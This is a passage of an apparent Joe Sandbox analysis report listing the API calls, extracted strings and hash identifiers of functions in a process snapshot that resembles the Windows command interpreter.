                                                                                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823FD0F9
                                                                                                  • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7823FD10F
                                                                                                  • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7823FD166
                                                                                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823FD17A
                                                                                                  • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7823FD18C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3008996577-0
                                                                                                  • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                  • Instruction ID: 87271fe6c51b18b102dbb10994833c8ad19e4b4b68d08694abf8a9f68f41a301
                                                                                                  • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                  • Instruction Fuzzy Hash: E1214F36B14651CAF740AB71E4100BDBBB0FB4DB4AB945125DE0E53B98DF78D445CB24
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateSemaphore
                                                                                                  • String ID: _p0$wil
                                                                                                  • API String ID: 1078844751-1814513734
                                                                                                  • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                  • Instruction ID: 807a6166325d229a64678048fc2fb4d0acbe51463ae9e2531c857805f3190301
                                                                                                  • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                  • Instruction Fuzzy Hash: B151E462B1974283EE65AF14A0646B9A2A0FF84B92FF44479DA0D07F81DEBCE405C320
                                                                                                  APIs
                                                                                                  • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF7823FB934
                                                                                                  • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7823E5085), ref: 00007FF7823FB9A5
                                                                                                  • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7823E5085), ref: 00007FF7823FB9F7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                  • String ID: %WINDOWS_COPYRIGHT%
                                                                                                  • API String ID: 1103618819-1745581171
                                                                                                  • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                  • Instruction ID: 069345cfbd680f5bb64e7e0e7fdcdbb599d72df694f4f654d6ca3917b6612967
                                                                                                  • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                  • Instruction Fuzzy Hash: 3241C7A290874192EA50AF11E420279B7B1FB4DB91FE58279DE4D03791DF7CE885C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$_wcslwr
                                                                                                  • String ID: [%s]
                                                                                                  • API String ID: 886762496-302437576
                                                                                                  • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                                                  • Instruction ID: d956c273e2db525fb479cb8311d6e96c983df4b7e19b9383450a590d8e62bbe0
                                                                                                  • Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                                                  • Instruction Fuzzy Hash: BA319C32709B8285EB61EF21D8503E9A7A0FB88B89F944035CE8D4BB55DF7CD685C310
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823E33A8: iswspace.MSVCRT(?,?,00000000,00007FF7823FD6EE,?,?,?,00007FF7823F0632), ref: 00007FF7823E33C0
                                                                                                  • iswspace.MSVCRT(?,?,?,00007FF7823E32A4), ref: 00007FF7823E331C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: iswspace
                                                                                                  • String ID: off
                                                                                                  • API String ID: 2389812497-733764931
                                                                                                  • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                  • Instruction ID: 4b2031217593703201a4752d024d04d4e5a390db72d15ef3dc20ca1450b8865a
                                                                                                  • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                  • Instruction Fuzzy Hash: 94218325E0C652A1FB607B15D420679E7A0FF85B92FE88078D91E47E80DE9CE884C721
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                  • String ID: %s=%s$DPATH$PATH
                                                                                                  • API String ID: 3731854180-3148396303
                                                                                                  • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                  • Instruction ID: c8e4b21825bb629b144f71d56f8391f70e62d4f5831dcec9a481430fd835bd28
                                                                                                  • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                  • Instruction Fuzzy Hash: 9821C815B0865680EF54BB15F450279A360FF84B81FE8407ADD0D47B94DEBCE440C370
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcscmp
                                                                                                  • String ID: *.*$????????.???
                                                                                                  • API String ID: 3392835482-3870530610
                                                                                                  • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                  • Instruction ID: 57c706188fe7d45b213148d2696658ccb0666afcd237241c659faeca132a7e2d
                                                                                                  • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                  • Instruction Fuzzy Hash: 0111C229F24B9291E764AB26E450139B2A0FB44B81FA85074CE8D47F95DFBDE881D720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: fprintf
                                                                                                  • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                  • API String ID: 383729395-2781220306
                                                                                                  • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                  • Instruction ID: fd34d354a674c09196115aebba6e81d383ddfed5fd1fc9274290e13301f22d00
                                                                                                  • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                  • Instruction Fuzzy Hash: 3011912190864291EF55AB14E9100B9A361FB447B2FE44376D67E43AD4EFBCE886C760
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: iswspacewcschr
                                                                                                  • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                                  • API String ID: 287713880-1183017076
                                                                                                  • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                  • Instruction ID: 532bfdfd5c79e86b235960805992d5bf39d27c42c75174d91aaf8bf34ecb5ce2
                                                                                                  • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                  • Instruction Fuzzy Hash: 4FF0A425A1C656A1EA60AB41F420179E9E0FF44F42BE59174D94D53E44DF7CE484C320
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                  • API String ID: 1646373207-2530943252
                                                                                                  • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                  • Instruction ID: 1e4ba1a38b02d7eaab041f31c5eac1e9af2d1533683da926838a670fd3640a29
                                                                                                  • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                  • Instruction Fuzzy Hash: E601CC65A0DA06D1EA84A711E851174A6A0FF49772BF44779C53E13BE0DEAC6C89C730
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                  • API String ID: 1646373207-919018592
                                                                                                  • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                  • Instruction ID: 0aa17d8f637b380250e31f0675de3535c99a08ec9a724d7223741cafe54ece68
                                                                                                  • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                  • Instruction Fuzzy Hash: 9FF03A21B18B8192EA40AB12F444079FE60FF89BD2B98D175DA4E03B14CFBCD885C720
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$CurrentDirectorytowupper
                                                                                                  • String ID:
                                                                                                  • API String ID: 1403193329-0
                                                                                                  • Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                                                                                  • Instruction ID: 11b568610cced15c52996b30241cb691fb0d83f64fc49b0569ea93eeab0e49e4
                                                                                                  • Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                                                                                  • Instruction Fuzzy Hash: BA61BF32B087828AE760EB61D8542EDB7B4FB44749FA04179DE9D03E99DF78E494C710
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnicmp$wcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 3270668897-0
                                                                                                  • Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                                  • Instruction ID: e054e8a615b3190133d4921d067e75a7b293fbac020b45e761d7782526e41fd3
                                                                                                  • Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                                  • Instruction Fuzzy Hash: 5751B31AE08642A1EB507F11D420179E7A0FF54B92FE88079DA0E07ED5DEACD889C370
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$DriveFullNamePathType
                                                                                                  • String ID:
                                                                                                  • API String ID: 3442494845-0
                                                                                                  • Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                                                                                  • Instruction ID: 67b8f34c99b1c808fc4e9e905cf9277b940ddb33a9d92cfd28027be3a76764d2
                                                                                                  • Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                                                                                  • Instruction Fuzzy Hash: E731BE32719BC28AEB60DF21E8507E9B7A4FB88B85F944079EA4D47B94CF38D645C710
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                  • String ID:
                                                                                                  • API String ID: 140117192-0
                                                                                                  • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                  • Instruction ID: 1866bf5a4e4f806cbaddde4cf0c7080a1406db92ba7b3f957dec2df49e21cb62
                                                                                                  • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                  • Instruction Fuzzy Hash: B041DC35A08B41D5EB90AB08F850365B764FB88755FE04139DA8D47B64DFBEE889C730
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File_get_osfhandle$TimeWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 4019809305-0
                                                                                                  • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                  • Instruction ID: 3da9f059d3bc814d8a505bba42161ef8f92b5d5c4a9eaced987106a50dc09be9
                                                                                                  • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                  • Instruction Fuzzy Hash: D131C122A0874282FBA06B15B450379EBA0BF49B52FA4527DDD0D53FE5CFBCD854C620
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
